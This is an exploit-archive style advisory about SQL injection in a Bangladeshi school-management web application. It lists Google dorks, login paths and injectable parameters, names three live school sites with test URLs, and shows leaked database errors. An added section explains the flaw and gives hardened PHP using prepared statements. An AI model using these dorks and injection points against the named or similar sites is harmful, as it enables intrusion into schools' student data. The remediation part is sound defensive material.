Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability

Author: KingSkrupellos, Published: 11-01-2019
#####################################################################

# Exploit Title : Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : sikdercomputer.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Design & Developed by Sikder Computer, Mathbaria'' site:edu.bd
intext:''Powered by Sikder Computer'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-sikder-computer-center-mathbaria-bd-sql-injection.html?pid=182084#pid182084

#####################################################################

# Admin/Teacher/Student Panel Login Path :
***************************************

/PATH/admin/index
/PATH/students_panel/index

# SQL Injection Exploit :
***********************

[PATH]/view_gallery_meetings?page=[SQL Injection]

[PATH]/current_success_students_info?id=[SQL Injection]

[PATH]/ex_success_students_info?id=[SQL Injection]

#####################################################################

# Example Vulnerable Sites =>
*****************************

Note : (67.23.238.179) => There are 1,107 domains hosted on this server.

[+] sbss.edu.bd/sonar/view_gallery_meetings?page=1%27

[+] nalivimss.edu.bd/nali/view_gallery_meetings?page=1%27

[+] laylamalekia.edu.bd/layla/current_success_students_info?id=16%27

#####################################################################

# SQL Database Error :
*********************

Warning: mysql_connect(): Access denied for user 'nalivims_sms'@'localhost'
(using password: YES) in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 3

Warning: mysql_select_db() expects parameter 2 to be resource, boolean given in
/home/nalivimssedu/public_html/nali/admin/config/config.php on line 5
Couldn't Connect to the database ***No database found ***

Warning: mysql_query(): Access denied for user ''@'localhost'
(using password: NO) in /home/nalivimssedu/public_html/nali/view_gallery_meetings.php on line 19
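
Added example (not part of the original advisory and not the vendor's code): the warnings above show the pages calling the legacy mysql_* API, which was removed in PHP 7.0, and rendering PHP warnings with file paths and database user names to the visitor. A hardened handler for an integer parameter such as id follows; the table success_students, its columns, the database name school_db and the DB_USER/DB_PASS environment variables are hypothetical placeholders.

```php
<?php
// Added example, not the vendor's code. Table/column names, DSN and
// credential sources below are hypothetical placeholders.
declare(strict_types=1);

// Do not render PHP warnings (paths, DB user names) to visitors; log them.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/** Return a positive integer from the query string, or null if invalid. */
function int_param(string $name, int $max = PHP_INT_MAX): ?int
{
    $v = filter_input(INPUT_GET, $name, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => $max]]);
    return ($v === false || $v === null) ? null : $v;
}

$id = int_param('id');
if ($id === null) {           // rejects values such as "16'" before any SQL runs
    http_response_code(400);
    exit('Bad request');
}

try {
    $pdo = new PDO(
        'mysql:host=localhost;dbname=school_db;charset=utf8mb4', // placeholder DSN
        getenv('DB_USER') ?: '', getenv('DB_PASS') ?: '',
        [
            PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // server-side prepared statements
        ]
    );
    // The value is bound as a parameter, never concatenated into the SQL text.
    $stmt = $pdo->prepare('SELECT name, result FROM success_students WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    error_log('DB error: ' . $e->getMessage()); // server log only
    http_response_code(500);
    exit('Internal error');
}

if ($row === false) {
    http_response_code(404);
    exit('Not found');
}
echo htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8');
```

The same pattern applies to the page parameter of view_gallery_meetings; pass a sensible upper bound as the second argument of int_param.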

#####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#####################################################################